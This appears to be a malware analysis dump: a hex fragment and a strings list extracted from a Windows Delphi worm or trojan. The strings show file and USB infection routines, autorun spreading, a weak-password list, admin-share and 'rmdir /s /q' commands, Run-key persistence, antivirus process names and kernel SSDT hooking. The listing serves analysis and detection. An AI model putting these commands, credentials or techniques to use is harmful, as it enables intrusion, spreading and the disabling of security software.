0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings
.-
\
-
 
.`
~
 X~
.O..L..c
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
A call to an OS function failed
Access violation
Application Error1Format '%s' invalid or incompatible with argument
April
Assertion failed
August	September
Bitmap image is not valid
Cannot assign a %s to a %s%List does not allow duplicates ($0%x)%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Canvas does not allow drawing Clipboard does not support Icons
Control-C hit
December
Division by zero
DVCLAL
$Error creating variant or safe array)Variant or safe array index out of bounds
Exception in safecall method
External exception %x
February
File access denied
File not found
Floating point division by zero
Floating point overflow
Floating point underflow
Friday
Icon image is not valid!Cannot change the size of an icon
Integer overflow Invalid floating point operation
Interface not supported
Invalid argument
Invalid argument to date encode
Invalid argument to time encode
Invalid class typecast0Access violation at address %p. %s of address %p
Invalid filename
Invalid numeric input
Invalid pointer operation
Invalid property value List capacity out of bounds (%d)
Invalid variant operation%Invalid variant operation (%s%.8x)
Invalid variant type
Invalid variant type conversion
I/O error %d
January
jjjj
July
June
List count out of bounds (%d)
List index out of bounds (%d)+Out of memory while expanding memory stream
MAINICON
March
Monday
No argument for format '%s'"Variant method calls not supported
November
October
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
Operation not supported
Out of memory
Out of system resources
PACKAGEINFO
Privileged instruction(Exception %s in module %s at %p.
Range check error
Read
Read beyond end of file	Disk full
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Saturday
%s%s
%s.Seek not implemented$Operation not allowed on sorted list
%s (%s, line %d)
Stack overflow
Stream read error
Stream write error
Sunday
System Error.  Code: %d.
Thursday
Too many open files
Tuesday	Wednesday
Unexpected variant error
Variant or safe array is locked
Variant overflow
Write
                                                                
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
000000
0123456789ABCDEF
0J5_s8
0S^9"p
111111
11111111
121212
123123
123456
1234567
12345678
123456789
1234qwer
123abc
123asd
123qwe
1Kill_Unit
1PE_Infect
1t}8\cm
; ;&;,;2;8;>;D;J;P;V;\;b;h;
3Messages
5201314
5!2B4~@7
5,595Z5y5
5aor8q
5d@m_X
5)kK3Z
5W(Nt/
654321
6zeb,(
88888888
|8M"5"
8ngtejd&wub;&ourt=.)spv(15BVW)BII(fiph.ki)Iri%!qmcun97!nanfnp:188(h`vflc:
901100
@@9A	@J
9b7v@J
9GC]E7
9H7aLdF
9l$\w_
9Y(p@W
A3t?U$
A<5#=E
abc123
admin$
admin123
administrator
Administrator
advapi32.dll
ADVAPI32.DLL
ANSI_CHARSET
AnsiString To UnicodeString Error!
Apartment
ARABIC_CHARSET
ARkBM!
Array 
[AutoRun]
:\autorun.inf
B4a<(/	
BALTIC_CHARSET
baseball
$$.bat
-Bausm]
-Bb=O\
!B\`&h
BOFWLF
Boolean
bPft5V
bw2sIOb
ByRef 
;bYu	B\H
CaptureNet
ccEvtMgr
ccProxy
C ;C$s
ccSetMgr
cH6dh"
ChangeServiceConfig2A
ChangeServiceConfig2W
CharNextA
CharToOemA
CharUpperBuffA
CHINESEBIG5_CHARSET
cl3DDkShadow
cl3DLight
clActiveBorder
clActiveCaption
clAppWorkSpace
clAqua
Classes
^Classes
clBackground
clBlack
clBlue
clBtnFace
clBtnHighlight
clBtnShadow
clBtnText
clCaptionText
clCream
clDefault
clFuchsia
clGradientActiveCaption
clGradientInactiveCaption
clGray
clGrayText
clGreen
clHighlight
clHighlightText
clHotLight
clInactiveBorder
clInactiveCaption
clInactiveCaptionText
clInfoBk
clInfoText
clLime
clMaroon
clMedGray
clMenu
clMenuBar
clMenuHighlight
clMenuText
clMoneyGreen
clNavy
clNone
clOlive
CloseHandle
CloseServiceHandle
closesocket
clPurple
clScrollBar
CLSIDFromProgID
clSilver
clSkyBlue
clTeal
clWhite
clWindow
clWindowFrame
clWindowText
clYellow
cmd.exe /c net share 
cmd.exe /c net share admin$ /del /y
c:\MyRARwork
CoAddRefServerProcess
CoCreateInstance
CoCreateInstanceEx
CoInitialize
CoInitializeEx
Common Files
ComnView
CompareStringA
ComPlus Applications
computer
connect
Consts
ControlService
Cool_GameSetup.exe
CopyFileA
CoReleaseServerProcess
CoResumeClassObjects
CoSuspendClassObjects
CoUninitialize
CPh@iC
"C:\Program Files\InternetExplorer\iexplore.exe" -nohome
C:\Program Files\WinRAR\myrar.txt
C:\Program Files\WinRAR\winrar.exe
"C:\Program Files\WinRAR\winrar.exe" u -as -ep1 -inul -ibck "
"C:\Program Files\WinRAR\winrar.exe" x -inul -ibck -p- "
c:\QQ.sys
CreateBitmap
CreateBrushIndirect
CreateCompatibleBitmap
CreateCompatibleDC
CreateDIBitmap
CreateDirectoryA
CreateEventA
CreateFileA
CreateFontIndirectA
CreateIcon
CreatePalette
CreatePenIndirect
CreateServiceA
CreateThread
CreateToolhelp32Snapshot
C<"u1S
Currency
+cV2;1
CVariants
C-vO[@^
cxd44lK
cxzccccccccccccccccccccccccccccccccc
C(_^[Y]
database
DbgPrint
Decimal
Default
DEFAULT_CHARSET
del %0
DeleteCriticalSection
DeleteDC
DeleteFileA
DeleteObject
DeleteService
$ /del /y
Desktop_1.ini
DestroyIcon
.)D$H)
{d<+H2Y
Dispatch
DispatchMessageA
Documents and Settings
\Documents and Settings\All Users\
\Documents and Settings\All Users\Start Menu\Programs\Startup\
DosDateTimeToFileTime
Double
DrawIconEx
drivers\
Dsniff
D$t+D$\
D$t#D$h
dwPointerRva: %.8X = dwKSDT!
%.*d`z@
EAbstractError
EAccessViolation
EAssertionFailed
EASTEUROPE_CHARSET
	EControlC
EConvertError
EDivByZero
e(eWrv
	EExternal
EExternalException
EFCreateError
EFilerError
EFileStreamError
EFOpenError@DA
EHeapException
}EhF2s
EInOutError
	EIntError
EIntfCastError
EIntOverflow
EInvalidCast
EInvalidGraphic(
EInvalidGraphicOperation
EInvalidOp
EInvalidOperation
EInvalidPointer
e*]%Ka2
EListError
EMathError
enable
EnterCriticalSection
EnumCalendarInfoA
EnumWindows
EoKI$^
	EOleError
EOleException
EOleSysError
EOSError
EOutOfMemory
EOutOfResources\FA
	EOverflow
EPrivilege
ERangeError|
EReadError
ErrCode
ESafecallException
EStackOverflow
EStreamError
EStringListError
EUnderflow
EVariantArrayCreateError
EVariantArrayLockedError
EVariantBadIndexError
EVariantBadVarTypeError\
EVariantDispatchError
EVariantError
EVariantInvalidArgError
EVariantInvalidOpError
EVariantNotImplError
EVariantOutOfMemoryError
EVariantOverflowError
EVariantTypeCastError
EVariantUnexpectedError
EWriteErrorHEA
ExAllocatePool
ExAllocatePoolWithTag
	Exception
ExFreePool
ExFreePoolWithTag
ExitProcess
Explorer
ExtractIconA
eYF	o?`
e>YqmkbkruX`~tiiv`t*`~a%
eyz=B_
EZeroDivide
<F0,@99
fBuR>?
FComObj
File Read Error!
FileTimeToDosDateTime
FileTimeToLocalFileTime
FileTimeToSystemTime
FindClose
FindFirstFileA
FindNextFileA
FindResourceA
Find Ssdt Base Error!!!
FindWindowA
FireSvc
<fj -'
FormatMessageA
FPUMaskValue
FreeLibrary
FreeResource
fuckyou
FunUnit
g6Evn!
ganran
GB2312_CHARSET
gdi32.dll
GDI32.DLL
GetACP
GetBitmapBits
GetCommandLineA
GetCPInfo
GetCurrentPositionEx
GetCurrentThreadId
GetDateFormatA
GetDeviceCaps
GetDIBits
GetDiskFreeSpaceA
GetDiskFreeSpaceExA
GetDriveTypeA
GetErrorInfo
GetFileAttributesA
Get File Info Error!.ExitProc!
Get File Memory Error!
GetFileSize
GetFileType
GetFullPathNameA
gethostbyname
gethostname
GetIconInfo
GetKeyboardType
GetLastError
GetLocaleInfoA
GetLocalTime
GetLongPathNameA
GetMessageA
GetModuleFileNameA
GetModuleHandleA
GetObjectA
Get PE Load Memory Error!!!
GetProcAddress
GetStartupInfoA
GetStdHandle
GetStockObject
GetStringTypeExA
GetSysColor
GetSystemDirectoryA
GetSystemMetrics
GetSystemPaletteEntries
GetTempPathA
GetTextMetricsA
GetThreadLocale
GetTickCount
GetVersion
GetVersionExA
gf,}[_c_>q
GlobalAlloc
GlobalFree
GlobalHandle
GlobalLock
GlobalReAlloc
GlobalUnlock
godblessyou
 goto try1
 goto try2
Graphics
+Graphics
GREEK_CHARSET
&h0[K{/}Df
HANGEUL_CHARSET
harley
hDdk S
Heap32First
Heap32ListFirst
Heap32ListNext
Heap32Next
HEBREW_CHARSET
height
|=-HfN
HNavigate
hpSF{V
Ht Ht.
HTTP\shell\open\command
hY]:RI
'i1Fz<
$$.Ico
.idata
if exist "
ihavenopass
IInterface
ImageBase: 0x%.8X, KeServiceDescriptorTable: 0x%8X, SSDT BaseAddress: 0x%8X, SSDT Count: 0x%X
inet_addr
inet_ntoa
INFNAN
InitializeCriticalSection
InstallShield Installation Information
Integer
InterlockedDecrement
InterlockedExchange
InterlockedIncrement
InternetCloseHandle
Internet Explorer
InternetExplorer.Application
InternetGetConnectedState
InternetOpenA
InternetOpenUrlA
InternetReadFile
I;PjWJ
Is File No MZ Header!!!
Is File No PE Header!!!
IStringsAdapter
I^*+\u
+iZ'9m
JEQtMk
jiamijiemi
jianceshaomiao
JOHAB_CHARSET
kavsvc
K}%Ekhvqqcv
kernel32.dll
KERNEL32.DLL
KeServiceDescriptorTable
KillTimer
KJ.Y%qv
kl~pn}
KPfwSvc
KPh@iC
KWindows
~KxI[)
l&374$Fkk/
*(}l4Imog
LeaveCriticalSection
letmein
LoadIconA
LoadLibraryA
LoadLibraryAGetProcAddressVirtualProtectVirtualAllocVirtualFreeExitProcessRegOpenKeyASetROP2WNetAddConnection2ANetRemoteTODCoInitializeVariantCopyExtractIconAURLDownloadToFileAGetDCInternetOpenAhtons
LoadLibraryExA
LoadResource
LoadStringA
LocalAlloc
LocalFileTimeToFileTime
LocalFree
LockResource
LongWord
lordsys
%{lOwl9
	Lsp0[=
lstrcpynA
lstrlenA
lsuv>(.akhfjatxh`nbgpnnh*cnephsiqs/ekj.rmho)pnnh*syr
lsuv>(.qsp/36DQU*DNK+`nrk(eisi/r|s
lsuv>(.qsp/36DQU*DNK+SK(Lsl
lz(T/pe
m7%,Pn{
MAC_CHARSET
Map %s Demo: %.8X!!!
Map %s Error!!!
McAfeeFramework
McShield
McTaskManager
m/d/yy
memcpy
MessageBoxA
Messenger
mH*2NC
Microsoft Frontpage
MiniReg
MiniSniffer
mmmm d, yyyy
:mm:ss
Module32First
Module32FirstW
Module32Next
Module32NextW
MoveToEx
Movie Maker
mpr.dll
MPR.DLL
MskService
MSN Gamin Zone
MS Sans Serif
\M$^t@
MulDiv
MultiByteToWideChar
mustang
}m@X2F
mypass
mypass123
mypc123
myUPdatetxt.txt
naENsStp
navapsvc
netapi32.dll
NETAPI32.DLL
NetApiBufferFree
`NetBios
NetMeeting
NetRemoteTOD
NetScheduleJobAdd
NetShareEnum
Neutral
No.%d: Break...Now Ssdt %.8X
No.%d: Old: %.8X, New: %.8X
NPFMntor
NTDETECT.COM
ntkrnlpa.exe
ntoskrnl.exe
n[V&n9
>NXj-E
o	4\y5H?c
OCc-n|k
O$%e16
OEM_CHARSET
ole32.dll
OLE32.DLL
oleaut32.dll
OLEAUT32.DLL
OleStr
Open File Info Error!
OpenProcess
OpenSCManagerA
OpenServiceA
~OqfF[7
O^"q]U
Outlook Express
@$#O]x
p4,k=F
passwd
password
patrick
PeepNet
pl6_n%5
pMjC:Z
PostMessageA
P.reloc
Process32First
Process32FirstW
Process32Next
Process32NextW
P.rsrc
")~&~q}
qComConst
qF-Fl*H
qh$jM$
Q)j9*B
_QJl0nf~
QQQQQQQQSV
QQQQQQQQSV3
QQQQQQQQSVW3
QQQQQQSVW3
QQQQQSVW
QQQQSV
	QQR_X8m
QTypInfo
q+%u/\@
Q<"u8S
QueryPerformanceCounter
QueryServiceConfig2A
QueryServiceConfig2W
qwerty
*QWkD^
RaiseException
R>)D~-.
.rdata
ReadFile
Read File Info Error!
RealizePalette
Real Ssdt %.8X
Recycled
RegCloseKey
RegCreateKeyExA
RegDeleteValueA
RegOpenKeyA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
ReleaseDC
.reloc
ResetEvent
resizable
RESSDT
\\\\.\\RESSDTDOS
rGM*8V
rmdir /s /q 
RsCCenter
RsRavMon
RtlAnsiStringToUnicodeString
"RTLConsts
RtlFreeUnicodeString
RtlInitAnsiString
RtlUnwind
Runtime error     at 00000000
RUSSIAN_CHARSET
RVg,D*
sActiveX
SafeArrayCreate
SafeArrayGetLBound
SafeArrayGetUBound
SafeArrayPtrOfIndex
Schedule
SdZ]_^[
SelectObject
SelectPalette
SendMessageA
server
SetBkColor
SetBkMode
SetEndOfFile
SetEvent
SetFileAttributesA
SetFilePointer
SetFileTime
SetROP2
SetTextColor
SetTimer
shadow
sharedaccess
shell32.dll
SHELL32.DLL
*ShellAPI
shell\explore=
shell\explore\Command=
shell\open=
shell\open\Command=
shell\open\Default=1
SHFileOperationA
SHIFTJIS_CHARSET
ShortInt
Single
SizeofResource
,"SKk,1
s`)L$4
Smallint
SmartSniff
sNbUdD
SNDSrvc
Sniffer
socket
Software\Borland\Delphi\Locales
SOFTWARE\Borland\Delphi\RTL
Software\Borland\Locales
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun
Software\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVP
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KAVPersonal50
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\McAfeeUpdaterUI
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Network Associates Error Reporting Service
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ShStatEXE
SPBBCSvc
spynet
StartServiceA
StatusBar
strcat
strcpy
StretchBlt
_stricmp
String
Strings
svchosL.exe
SXZzVr!
S$_^[Y]
sybase
Symantec Core LC
SYMBOL_CHARSET
SysAllocStringLen
SysConst
SysFreeString
SysInit
SysReAllocStringLen
System
system32
\SystemRoot\System32\
System Volume Information
SysUtils
/::)T}
<*t"<0r=<9w9i
t6,[\r
t9PVWh
tagEXCEPINFO 
TColor
TCustomMemoryStreamtMA
TCustomVariantType
temp123
TerminateProcess
	TErrorRec
test123
TExceptRec
	TFileName
TFileStream
TFontCharset
TGraphic
TGraphic 
THAI_CHARSET
THandleStream
!This program cannot be run in DOS mode.
This program must be run under Win32
Thread32First
Thread32Next
t%HtIHtm
TIconImage
TIdentMapEntry
	TIntConst
TInterfacedObject
TInterfacedPersistent
TInterfacedPersistenthHA
TlHelp32
TlsGetValue
TlsSetValue
TMemoryStream
$TMultiReadExclusiveWriteSynchronizer
TNetBIOS
t<"O3Fr
TObjecth
TObjectt
toolbar
Toolhelp32ReadProcessMemory
TPatternManagerSV
TPersistent
TPersistentxGA
\TP_>j
@"`"tqwg
^|Tqy(
	TRegGroup
TRegGroups
TResourceManager
[TS<"#|cC
TSearchRecX
TSharedImage
TStream
TStringItem
TStringList
TStringList,KA
TStrings
TStringsTIA
TThreadListxGA
TThreadLocalCounter
t$t#t$l
TURKISH_CHARSET
TXPlatform.exe
U,.-.._
`U"F^F
Uk5YIZ
UnhandledExceptionFilter
Unknown
UnrealizeObject
Update
URLDownloadToFileA
URLMON.DLL
USB_Infect
user32.dll
USER32.DLL
UTypes
V3[3i3
v}}!9k
VarAdd
VarAnd
VarBoolFromStr
VarBstrFromBool
VarBstrFromCy
VarBstrFromDate
VarCmp
VarCyFromStr
VarDateFromStr
VarDiv
VarI4FromStr
Variant
VariantChangeType
VariantChangeTypeEx
VariantClear
VariantCopy
VariantInit
Variants
VarIdiv
VarMod
VarMul
VarNeg
VarNot
VarR4FromStr
VarR8FromStr
VarSub
VarUnit
$VarUtils
VarXor
v/D+f0`
VirtualAlloc
VirtualFree
VirtualProtect
VirtualQuery
Visible
Vlb#>}Z
]vWtJHl
v	Z$8s
WaitForSingleObject
wbcI.:
WideCharToMultiByte
WideStringh
WINDOWS
Windows Media Player
Windows NT
\WINDOWS\Start Menu\Programs\Startup\
WindowsUpdate
WinExec
?WinInet
wininet.dll
WININET.DLL
\WINNT\Profiles\All Users\Start Menu\Programs\Startup\
WinRAR
WinSock
Winsock Expert
WinSvc
WinSvcEx
WNetAddConnection2A
WNetCancelConnectionA
wRh#L`
WriteFile
WSACleanup
WSAStartup
wscsvc
wsock32.dll
WSOCK32.DLL
Wt_Time
X^2NII0=
x^7DGT
xf#2BI
%"X*kp
XPTPSW
xTac#=
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
]X&/yh
y4"{+4
Y?"'&mt
Ypd+z$
yu4/9v
~yv+BgO
yVfaM:
_^[YY]
$YZ_^[
$YZ]_^[
YZ]_^[
(Z]_^[
$Z]_^[
z=&Bk^
zJ\f0B
@[:zO.
ZTUWVSPRTj
ZwClose
ZwCreateFile
ZwQueryInformationFile
ZwQuerySystemInformation
ZwQuerySystemInformation failed! ulNeededSize = %ul
ZwReadFile
zxcvxcxzcxzzzzzzzzzzzzzzzzzzzzzzzzzz
`	<z:Z